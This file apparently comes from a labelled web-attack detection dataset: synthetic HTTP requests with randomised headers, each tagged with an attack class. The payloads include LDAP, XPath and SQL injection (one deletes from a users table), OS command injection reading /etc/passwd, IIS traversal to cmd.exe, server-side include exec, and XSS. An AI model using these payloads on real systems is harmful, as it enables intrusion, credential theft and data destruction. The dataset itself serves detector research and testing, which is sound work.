User-Agent: Mozilla/1.3 (Windows; U; WinNT 0.6; NE-rc; rv:7.5.2) Gecko/54892684
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3216x516
Via: 4.4 www.Spyrs.css, HTTP/6.3 248.22.6.35, mn8ten/7.1 www.sfeea.html:056
Transfer-Encoding: t0ie; urjith=rLho
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46398
Start - Id: 37928
class: LdapInjection
GET /sgX/ajSB3018uh4vtZXn/1r7E0wkIREn1o/mXwF1rQruqZ71ZGEmd/fseienhl3dfechsnn/dteksstfseseye1ed8d/hifrLomtg0eowaoce/o2nsP7Bhoefiet/6ssA4q9eroekhltoo/gs5fNsnireleltraob/TLxmlM8XacceptL.jsp?reidb=659%29%28%26%28objectClass%3Deql%29%28%7C%28sn%3D+++rayg%29%28cn%3Di5s+++J*%29%29&fMPrWservicesk6epa-=Ekjg&Emhnhdbe2gaocE=id0+msa%3Ftselectc5&zegwynhtothx=l6R&eesgpehoiKrr=93814&tayeNo1swii=1t&duel=iZ31h8EV HTTP/1.0
Host: 186.35.149.21:80
Connection: enm9
Accept: */*
Accept-Charset: windows-874;q=0.1, euc-jp;q=0.2, iso-8859-4, utf-7;q=0.0
Accept-Encoding: deflate;q=0.3, gzip;q=0.8, compress
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 101.129.127.238
Cookie: iueiEMyreig6ly=a1>tvarcibd<lhN<n;2wnliia7=4315742450;mtiweqmewt=85 ;il64yom=77;k8tfeaboMhLxa=06
Cookie2: $Version="624"
Date: Wed, 29 Apr 09 20:27:38 CET
ETag: "yzFFwi2xkZtkbQro8al"
Expect: dtawu=4tsB
From: zoeyt@dfSho.com
If-Modified-Since: Wed, 11 Aug 04 10:11:15 CET
If-Unmodified-Since: Wed, 21 Feb 07 16:17:12 UTC
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: Tue, 01 Apr 08 03:09:34 GMT
Max-Forwards: 29
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic VWFjaDp3YXls
Authorization: ffwo gostPoe8=llnctoy
Range: 478-6,9746-59,-9293
Referer: http://www.tsnbs.net/rNb0ysl/die0rnc.gz
TE: trailers
Trailer: Upgrade
User-Agent: n6hCn/1.8.0.9
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 649x451
Via: FTP/2.7 47.86.111.179
Transfer-Encoding: PChnah; hsgbn=0e6cb
Upgrade: udtE/5.5, hiteNc/1.2, tffIc/7.5, nhr/8.0, ptIvu/0.9
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37928
Start - Id: 37332
class: LdapInjection
GET /qrtgholylOleao3gtlu/dZq/t4TlLg@/rtrrkyai/e-.ezggFtBLT/untjddenstctecoaiy/7Ql/u9dPm-6PJ-0J/M99rcpJ8/i10UEgSCw.J.jpeg?mp2Bfbehai=eerucriahaa&edDEaMrotdy=10&t8u3be=j56 HTTP/1.0
Host: 109.74.127.21
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: koi8-r;q=0.2, iso-2022-jp
Accept-Encoding: ) (   | (   cn=*o'brien* )(mail  =*o    'brien* )  
Accept-Language: *
Cache-Control: wwaN=An
Client-ip: 131.232.136.148
Cookie: H0eaaaA=oh s;tee=316740;aqen=9oe0like;dlrtbzOxe=Gf;stecDieeeCt=eya-qdaH@
Cookie2: $Version="671"
Date: Sun, 08 Feb 09 23:08:48 CET
ETag: "y.AGAT6iCnkR-d."
Expect: 100-continue
From: ddtp@lesT.org
If-Modified-Since: Tue, 17 May 05 06:56:24 GMT
If-Unmodified-Since: Mon, 01 Mar 04 19:06:46 UTC
If-Match: *
If-None-Match: "VLGJSfT8EuagCE4"
If-Range: Tue, 26 Sep 06 14:52:59 UTC
Max-Forwards: 5
MIME-Version: 9.0
Pragma: s=ds8vgs53
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: NTLM a2FMZWF3dHR4NHVpc2VzMG90ZXMxdnRvc3RvNWRhbzFoc250cnlubXI4Zg==
Range: 06765-95986,-6,-81
Referer: /oswuhrf/kwre/etiy.exe
TE: trailers,deflate;q=0.9,chunked;q=0.2
Trailer: Range
User-Agent: Mozilla/7.4 (Windows; U; Win 9x 2.1; ho-rd; rv:7.7.3) Gecko/61320878
UA-CPU: 68000
UA-Disp: 387,0731,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8431x812
Via: 0.6 178.121.21.218, HTTP/6.0 www.Dei5.html
Transfer-Encoding: identity
Upgrade: 1ebn/7.7, ncep/4.4, t8re3m/6.5, PXE/8.4
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 255.193.19.186
X-Serial-Number: 06549032
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37332
Start - Id: 48554
class: XPathInjection
POST /sgV0GIskc.38zK7TPh/htey4/uFGrZFW7chpZzgsr-/wwl/sOEekSsw/qiatdL/at/knni9ikaite/4SUydTSb_CX@JI.asmx? HTTP/1.0
Content-Length: 391
Content-Language: eQbtepe,r0,it5op7tn
Content-Encoding: deflate
Content-Location: http://dfisSnae.net/dTcfheee/rtruhyyl/upjs/oeiAnezu.aspx
Content-MD5: YW9lblBPbnIzdW9lbnNyaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Feb 06 18:27:43 CET
Last-Modified: Sun, 30 Oct 05 17:34:13 UTC
Host: www.bitsfsbx.de
Connection: close
Accept: text/*;q=0.5, application/*, application/postscript;q=0.7
Accept-Charset: x-mac-chinesesimp;q=0.3, x-mac-chinesetrad;q=0.5
Accept-Encoding: compress;q=0.1, compress;q=0.5
Accept-Language: *
Cache-Control: min-fresh=87
Client-ip: 1.24.145.159
Cookie: OntOpeu=8708;uneBdhly=58167504;ioomrzrs8=977421;qvOuuj4Eag1lne=0t sOtaoopene&t;
Cookie2: $Version="8"
Date: Tue, 14 Feb 06 12:31:36 UTC
ETag: W/"9a.@kRmZK0277p2HO0wo"
Expect: 100-continue
From: 5lotN@aerqwne.st
If-Modified-Since: Thu, 03 Jul 08 24:41:32 CET
If-Unmodified-Since: Fri, 27 Feb 04 02:00:01 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Jun 09 23:36:36 GMT
Max-Forwards: 5
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM MXRlNHVscmduc2V3eDZybW10MmxjbmVlZ3QxdGVzcGF0ZQ==
Authorization: NTLM cm1zbFN2OW5hdHlkYmhmb0xrZ1lpRTRhb3F0c3B5ZFNob2UybQ==
Range: 31644-283996
Referer: /eiRr1rl/keOpelu/tmiuse/aportdad/bIuTAr.mp3
TE: trailers,trailers,deflate;q=0.3
Trailer: Via
User-Agent: tdse/9.3.2
UA-CPU: StrongARM
UA-Disp: 8923,087,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 429x1759
Via: HTTP/5.0 204.218.167.176, 6.3 www.ig96red.tiff, 3.8 www.lesWj.js
Transfer-Encoding: compress
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 856 94.254.67.38:3919 "jmu0gstq2hrnv" 
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tsi2ens=mXSII&ierh=rjtn1jtcEun&ehmsDA=982860349&j4jzD8=cth10logt652t&HP7CmG-=Atne&POzRdexec=66&rzgematyoclzino=ae&1sEoH=yxodhshhcntee&tAa=635664&tewnthunli6e=connecthceb&casa63cu9=2&nctslnRtayp=(i < count(eEAu/child::text())    and     j    <  count(her/child::comment())  and   k     < count(njsfn/child::*)   )&@3vjZYD=<e [pirhvrHh rshtn

End - Id: 48554
Start - Id: 48892
class: XPathInjection
GET /iJ@vAAfz.JF/5B@bpQ9LGvG./lzS_dHn/nmqj/gdruneiaHa/1cG2-Ylzw5p8wm5.cIC/Fu-e/BM@M2ZMs5/aeplhvjwrnrhn.php4?BVL78_q=isBqrfd8iH&F0aNctjcincludeecho3-=e5ltdvbscriptrhieme&izea=hso%28ltatD&tsEgha9ozAtekeo=xkjz6&Slrd=fh%40tYYANx&anheientanooeh=ov%27++or+++1%3C+++++y6t1%2FQ%2Fpsge%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D++++or+++++%27hiz8efLd%27++++%3D+%27 HTTP/1.0
Host: 188.174.94.137
Connection: close
Accept: application/postscript, application/*
Accept-Charset: ks_c_5601-1987, windows-1257, utf-7, ks_c_5601-1987;q=0.5, iso-8859-6
Accept-Encoding: *;q=0.5
Accept-Language: l-mmeRfny;q=0.7, lr-eThi, sit-s
Cache-Control: no-transform
Client-ip: 191.63.73.24
Cookie: AyfajmodcteE=y9FOyhYeUba1;sjrrk=2;rtre8oiiwrjkn=ha6hprocessing-instructionas2po
Cookie2: $Version="74"
Date: Mon, 29 Mar 10 09:40:17 GMT
ETag: "yoHUBRdDJNDe7kMqNoJu"
Expect: 100-continue
From: Cwemtetz@wf3dzee.it
If-Modified-Since: Sat, 05 Apr 08 19:54:32 CET
If-Unmodified-Since: Wed, 06 Dec 06 20:49:09 CET
If-Match: *
If-None-Match: "b5U_PH56mbZCgza1K3bn"
If-Range: Sun, 29 Nov 09 16:47:01 GMT
Max-Forwards: 186
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: eIkop stra6u=2eeltt
Range: 87-22
Referer: /tCQl/reyheimo/r4eOeocm.htm
TE: deflate,chunked;q=0.6,deflate;q=0.3
Trailer: User-Agent
User-Agent: Mozilla/6.1 (compatible; MSIE 2.3; Open BSD i386; lTmr; suEeReoty)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1420x8323
Via: aiaoc/6.2 www.wgAaa.js, 5.6 132.104.191.101, 9.0 www.nnsptt.png
Transfer-Encoding: deflate
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 981784
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48892
Start - Id: 44511
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.0
Host: 103.143.229.69
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: rmt-q;q=0.3, a9as-nu0e2voc;q=0.9, 2dBst2U-sIsa;q=0.8
Cache-Control: only-if-cached
Client-ip: 200.92.139.197
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="2"
Date: Sun, 01 Mar 09 18:16:53 UTC
ETag: W/"HcdXasxzouezv38hXg"
Expect: auaEbj2f=ti3z24oz
From: aOaort0e@ftfehuiid.cz
If-Modified-Since: Mon, 04 May 09 20:29:35 UTC
If-Unmodified-Since: Sun, 11 Jan 04 21:19:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 61
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 7-42
Referer: http://www.roaintn.st/Esapbe/rekwfq/ieha/tivay3ts/r0en.bin
TE: gzip;q=0.6
Trailer: Via
User-Agent: Mozilla/1.0 (compatible; MSIE 2.3; WinNT; ozheemotnr; 4earer7ta)
UA-CPU: PowerPC
UA-Disp: 715,347,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 455x841
Via: HTTP/8.2 189.183.226.152, HTTP/8.6 70.24.243.218, HTTP/9.7 www.edntn.gif
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44511
Start - Id: 36763
class: OsCommanding
GET /qidorDF7.8oMRqQo0J/72AidgrQnc-Ztmp.tiff?-_ZSJCG1y=edp&sk97Lget4fln=tatroekod9mrasiqp&mwrnl2gbtHsll=ls++++-las+++%2Fhome%2F+++%7C&0IW0KMhnRTEK=a40&titetGoc1bint5x=95692650&neunr3nnllaojux=26&E87nbwztag=s6o&jY7adminFps=1VqNHlhp8gU HTTP/1.0
Host: www.Tzet3.gov:1
Connection: keep-alive
Accept: text/xml;q=0.9
Accept-Charset: windows-1254;q=0.7, x-mac-hebrew, x-mac-turkish;q=0.7, euc-tw;q=0.4, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: ehhcptt-taa5;q=0.9, etciym-aarkximi;q=0.2, 6iyk9-ao6ervt, S5oxdhcn-ee;q=0.2, tdzolnoi-eushgvr
Cache-Control: max-stale
Client-ip: 130.81.190.203
Cookie: .Fgk=9;p8de1Fettrako=181;Obgsr=9498955
Cookie2: $Version="576"
Date: Thu, 22 Oct 09 14:55:43 UTC
ETag: W/"nq-5AohjOXHMiQfI"
Expect: 100-continue
From: excu@itaiLs8n.it
If-Modified-Since: Mon, 25 Dec 06 23:34:18 UTC
If-Unmodified-Since: Wed, 20 Aug 08 13:49:26 CET
If-Match: "F-Hii3Z_nyaZh6TY"
If-None-Match: "pIDBMmK1AyRKlwg@eGV@"
If-Range: *
Max-Forwards: 9639
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cavyd p9Spn=rbeshotc
Authorization: Basic cmd0b2xub2U6ak5ocjhsZQ==
Range: 8-,6-50
Referer: /ilIoil/nliru/arEmR/tjtr.doc
TE: trailers,gzip;q=0.5
Trailer: If-Range
User-Agent: Mozilla/4.4 (Windows; U; Win 9x 1.9; Ty-hi; rv:6.5.6) Gecko/87040463
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 232x1783
Via: HTTP/7.1 91.205.193.172, HTTP/0.0 www.binr.shtml:72201
Transfer-Encoding: gzip
Upgrade: veestt/0.4, vitr/3.3, tohkos/9.8, ypboEe/8.4, Resser/0.1
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36763
Start - Id: 43038
class: OsCommanding
POST /iX@8/YmOqnetcatcdHO-VEls.js? HTTP/1.1
Content-Length: 128
Content-Language: Jtd,tvp3nteo,ea9ina
Content-Encoding: identity
Content-Location: /esreuwmo/nmnrtyoa.jsp
Content-MD5: clBGczZlZW5hb3RwZTI5Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 04 12:46:30 UTC
Last-Modified: Mon, 16 May 05 03:55:47 UTC
Host: 215.225.88.242:85
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: E-Asychae, h-ti4hyTf;q=0.8, tls9-he4;q=0.9, epHqw-ho;q=0.6
Cache-Control: i='iligB'
Client-ip: 235.143.67.102
Cookie: fhnzmldmaen9lfo=68;ai4aeha=eNaTifOUG;tFpr3s=bqapU\aaiWnhLid;Nhvo7nrnnhnt=k7.a5fj4sh4a
Cookie2: $Version="6"
Date: Thu, 16 Jul 09 09:16:28 CET
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: a0ee@enelreh.it
If-Modified-Since: Mon, 16 Jan 06 19:38:22 UTC
If-Unmodified-Since: Thu, 24 Apr 08 06:09:09 UTC
If-Match: "2kQ@kSxpFdV4@fPXi1x"
If-None-Match: *
If-Range: Thu, 29 Mar 07 08:50:19 UTC
Max-Forwards: 3
Pragma: 3=cfce
Proxy-Authorization: Digest opaque="ais18i"
Authorization: NTLM aTRhbmVybHRzcXJlZVR0M3RzZTA2ZGVPZXpkZmlhdGU=
Range: -98633,070828-,-9277
Referer: http://www.idti5fr.fr/e4ehtnjr.mpg
TE: deflate
Trailer: Connection
User-Agent: eawef/1.1.4
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 1.3 7.245.118.66, 7.5 www.sh85n9c.png
Transfer-Encoding: gzip
Upgrade: sin/4.4, nanj/1.1, sfgit/8.7, sxHu/2.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.126.234.64
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~

a8wnntp9lsgBeh=hrrhe@5&8fleb8sesOg4y=dlz_Iku&ecerhe=|cat   /etc/passwd&o4YA3Qlu=495&hoocoqvera=hqh@GUZxsP5a&eyORV=Ht2i

End - Id: 43038
Start - Id: 39137
class: SSI
GET /eMM5nonQpPsj/0ewheenhmv7tdir1b/rzrjWXI1dkEImGw@99b/cuVH/AIttIob0onn/CeEtdesf5lrratjeeN/situneoayeoel.aspx?wpb=roey&oIa=ra2GOQF3g&st=ifG7lUsmQFDR&.HncXRvmpasswdf1=0%5D%2BsaTd0O%3Doud&z34whereOZ=lUlteoaouzekg&n7thsh92my=etntidhteLl&7lFN=%2Fek+4srNrexeofenba&tul=fE79ei&itiei=25077&isqtraom=m4wrq%3DV&LkCQsjQbgE=%27tmp%3Cagroup+byuT5os+tpneh&iofqc=e4oa4utssoor&ysNroO=ret8klieaa&htbodtwxVmKe4wg=drincludee&Ttc=0jLBkxBfCeph HTTP/1.0
Host: www.tWtrrve.biz:2
Connection: keep-alive
Accept: image/jpeg;q=0.3, text/*, application/zip;q=0.0
Accept-Charset: iso-8859-6;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: osxsPW=rrEoeo
Client-ip: 185.24.103.43
Cookie: ehIfi8Aao=asiTecw
Cookie2: $Version="66"
Date: Tue, 14 Apr 09 24:01:05 CET
ETag: W/"DRo586hwWsKMuM4ZMnE"
Expect: 100-continue
If-Modified-Since: Sat, 29 Jan 05 15:39:47 GMT
If-Unmodified-Since: Tue, 17 May 05 04:05:22 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 21 Mar 07 21:11:32 UTC
Max-Forwards: 9
MIME-Version: 4.1
Pragma: N9eer='dpsb'
Proxy-Authorization: gitr h0onae=rjjgr
Authorization: NTLM Y2VyMGFvaXgxUzZ0cGk1OWhoN3l0U25zSW45ZUlkZWh3dk90
Range: 31-14416,-57
Referer: /btsbnd.html
TE: chunked
User-Agent: <!-- #exec cgi="/cgi-bin/script?nctSauEoo"   -->
UA-Disp: 9875,2381,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 062x6317
Via: HTTP/5.1 10.13.154.177, HTTP/5.0 245.228.9.82
Transfer-Encoding: Cena80; tgpo=pasliuk
Upgrade: Henie/6.3, tak/0.7, Igbrcr/2.7
Warning: 386 www.xasZe.html "sgRjdihtd" 
X-Forwarded-For: 136.245.189.109
X-Serial-Number: 55795183768
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39137
Start - Id: 46915
class: XSS
POST /gT@cHFg2W/lwfdous/oH/19a92njKGQ/rg0YsisSmSGKfMaK/oaqtdS/vJyY06X9Z.WEJs6Ogo/Vcx1n.htm? HTTP/1.1
Content-Length: 422
Content-Language: rDtarEe
Content-Encoding: deflate
Content-Location: http://www.8hOluhW.gov/c6rdlThg/niRa8/2slrtr.nsf
Content-MD5: b3NhaE5kcHJwaTRKdG9Dcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sun, 25 Jan 04 14:56:32 UTC
Host: 210.222.137.231:80
Connection: close
Accept: audio/basic, audio/*, audio/x-wav
Accept-Charset: shift_jis;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=60
Client-ip: 67.18.221.141
Cookie: tah=rnf;msqh=eg4H0KLmR1;U2IJ_R-e-=544;GserdlhhEl1dmv=eRt6CUVrUww;0FdQ31n@J=e1ue%sdN/0dd7nuehttpsn\exec&
Cookie2: $Version="1"
Date: Sat, 02 Sep 06 21:30:31 GMT
ETag: W/"utOApzZbAhT5WSy.P0"
Expect: 100-continue
From: nlqn@timuoEgjAR.ch
If-Modified-Since: Tue, 28 Dec 04 16:44:26 UTC
If-Unmodified-Since: Tue, 25 Oct 05 14:48:51 UTC
If-Match: *
If-None-Match: "fVGh6Hz4BFoC-uY8Hu"
If-Range: Sat, 29 Apr 06 03:10:29 CET
Max-Forwards: 67
MIME-Version: 9.1
Pragma: rshnht='tis'
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: NTLM bnNyZ2xzaGVIbjludGVpYXNoZG5ob2lhZW50RWNoYzRlb21yTnQ=
Range: -790
Referer: /eaRi/ryehE.mdb
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.0 (Windows; U; Win 9x 4.1; rw-it; rv:6.8.4) Gecko/28568303
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: 7.1 www.mRerr7t3.jpg, 4.0 177.44.101.16, HTTP/6.0 92.30.98.233
Transfer-Encoding: gzip
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PimgiixDadmin=uiesozwhpgroup by?5wp&tsneeia03sm=Gedrrsi2&c2eoaehlajare=it &6sAderillSt=<div   style=   "    behaviour:     url([http://www.tisiit.com/script/webtA.php4]);">&8nFh=|(b&esa3sasom=45&eiYdnut2Do=1&4ecymnhlraleon=guPW&RXF13hr==autyHoa&lfijct=nxutEbbetween:Tg1drop7 nS/&13selectQ6-Y6nXs=hqOnF2Km7O0&OHMv=299&lk6WpahIFtpositionD=i ehoseann;ad&SimZactRurwc=cbtalR7hdrTe

End - Id: 46915
Start - Id: 43696
class: OsCommanding
GET /backup/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.9meohoeal.com
Connection: nhtudR
Accept: application/*, audio/basic;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.1, deflate, gzip;q=0.1
Accept-Language: Ciiimnf-T57rh5se, lesjb-9wifa4;q=0.3, nwtss-onbd, tha07r-iaCr4, uye1cu-tmexo2;q=0.1
Cache-Control: only-if-cached
Client-ip: 152.233.157.213
Cookie: 7sh=yiItn;soUataenms=auh0f(linkulzc';Nos=5729338;Ttpto=1566;majhaseme=A execn5;hE13tFere=3428
Cookie2: $Version="51"
Date: Sat, 27 Feb 10 10:14:13 CET
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: efdn@eboax.net
If-Modified-Since: Fri, 17 Mar 06 16:05:05 CET
If-Unmodified-Since: Thu, 18 Dec 08 20:39:07 CET
If-Match: "mJJG3z@q5TiwxT8jCP@"
If-None-Match: *
If-Range: *
Max-Forwards: 114
MIME-Version: 8.9
Pragma: 9ttnse7='lTntt'
Proxy-Authorization: csat8 fle0=tohc
Authorization: hrtgb etaRbkwo=eSe8
Range: 0932-655,7-822597,-7
Referer: http://www.aau1eu.biz/yn0ii/ttong.zip
TE: trailers,deflate;q=0.7
User-Agent: b2iFcen/6.8.8.6
UA-CPU: StrongARM
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0204x5029
Via: tn9/6.8 www.toau3rhr.jpg, ItiSp/3.9 www.oaao0u.tiff
Transfer-Encoding: compress
Upgrade: as8/8.8, mad/2.6, pEyuj/1.9, o5a8/8.7, ewmi2m/5.2
Warning: 158 www.shecn.js "Itetalhi5ooybnjthhbi" "Tue, 24 Jun 08 17:50:39 GMT"
X-Forwarded-For: 51.55.191.62
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 43696
Start - Id: 41287
class: SqlInjection
GET /ui/ntcwnepocvsowe/ltI-Qgqe7xEqy/d2IiRFXFWHm/nhedn8hssrWecouoeuiq/LNzIpqlsx1Z_Dcmd/DKgXYneinputEK4GQ/iio235Rho.bin?oidsse=2ag46sw&a4ts48n=a%3Behr&tua=tascl&osWez2pLG=6914733&Jrh1tfr-E5nullE=oeiunion%2Fs&Otcgecmft2sd=0j-1&enh4cn91gsahl=oqDordureu&toddre=34 HTTP/1.1
Host: www.iudcIae.cz
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: o-lwrere;q=0.6
Cache-Control: no-cache
Client-ip: 187.61.163.70
Cookie: e3si=82;SAoEM.Io=sz6'    );  DELETE     FROM  users   WHERE    upper(username)     = upper(   'admin
Cookie2: $Version="29"
Date: Sun, 22 Jul 07 02:15:14 UTC
ETag: "LJqmgcgLFKZLG_VI6q.-"
Expect: nozir=2tThasqs
From: muieo@6epi3hss.fr
If-Modified-Since: Sat, 24 Jan 09 22:04:44 GMT
If-Unmodified-Since: Fri, 28 Mar 08 03:56:37 UTC
If-Match: *
If-None-Match: "Ud_N9VXJXp1DJc.DB"
If-Range: Sat, 21 Aug 04 15:23:31 CET
Max-Forwards: 945
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: 2Toi zCgjsab1=0cdocs
Authorization: NTLM ZXYyaXdlVmY0dG5uaG9yTnFnbmU2bW5uaWxzYWRFRzg=
Range: 6-982,-186284,1-
Referer: /0hewe/lzee9em/Eyors/yGoethea/beAei.nsf
TE: trailers,chunked
Trailer: Referer
User-Agent: stgsniliz2oyieaae
UA-Disp: 9646,8421,16
UA-OS: Windows NT
UA-Color: color32
Via: 7.5 185.37.15.109:28, 1.9 213.12.210.254, 9.6 www.gtr050O.shtml
Transfer-Encoding: Snrr
Upgrade: tU5/4.7, t0e/4.3, aIbrw/2.1, hhrhs/1.6, xgnb/2.6
Warning: 394 www.weersiR.gif "aniskp" "Tue, 27 Apr 04 18:40:06 UTC"
X-Forwarded-For: 90.26.199.114
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41287
Start - Id: 46034
class: PathTransversal
GET /cIpZK_9T/sstd/fil68Ylmijuuw/so/rfHjXXMWPd/Hsci8rh/bdvtv/g58lr5agB2tu3D-k@Tqf/uPj5iO6k@-3HVtRC6E/u9L7JDTJIEZKv@g.jpg?V0ilia=36392312&from4EHaxp=er&Zldfei=hhn&terutksdsrEa1e=29209679&tRbtChnt=iml%24%7Ery&syse=oanrmertjHehh&tiot0ane3dt1I=ashutdown5lwryh&uslgrksth=63959&as04e6Nh=3shtpassgahC&fldwbodTo=e HTTP/1.1
Host: 55.84.193.97
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-roman;q=0.8
Accept-Encoding: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 238.4.91.163
Cookie2: $Version="01"
Date: Sat, 28 Jun 08 02:03:29 GMT
Expect: olLo=ev0eans
If-Unmodified-Since: Mon, 15 Feb 10 19:03:09 GMT
If-Match: *
Max-Forwards: 39
Referer: http://www.nlScl.cz/Cjftos/pksor/ioghd.nsf
User-Agent: e-I30nSq http://www.aitx.com
Warning: 967 www.etmh8ee.tiff "wey2naaecwy" "Wed, 20 Jul 05 21:29:25 GMT"
~~~~~: ~~~~~~~~~~~

null

End - Id: 46034
Start - Id: 48044
class: XSS
GET /uFF7gc6GdXC1BhdRx9/6nytsftqh/EaRY.jpg?Psferssoendyrti=%3Cbody+onload%3D%22+++++%5Balert%28%27binr%27%29%3B%5D+++++%22+%3E&cdtjlcen=tdrop%3B%40mtaeO%5Dd&yjcohE=vr1LVoM HTTP/1.1
Host: www.raaeat.it
Connection: 3bnt
Accept: image/jpeg, application/x-tar
Accept-Charset: big5, x-mac-korean;q=0.8, windows-1253;q=0.2, macintosh;q=0.7
Accept-Encoding: identity;q=0.0, compress;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 244.113.216.6
Cookie: a3ituwied=rs8tBOXC;vhayimdoev=5
Cookie2: $Version="2"
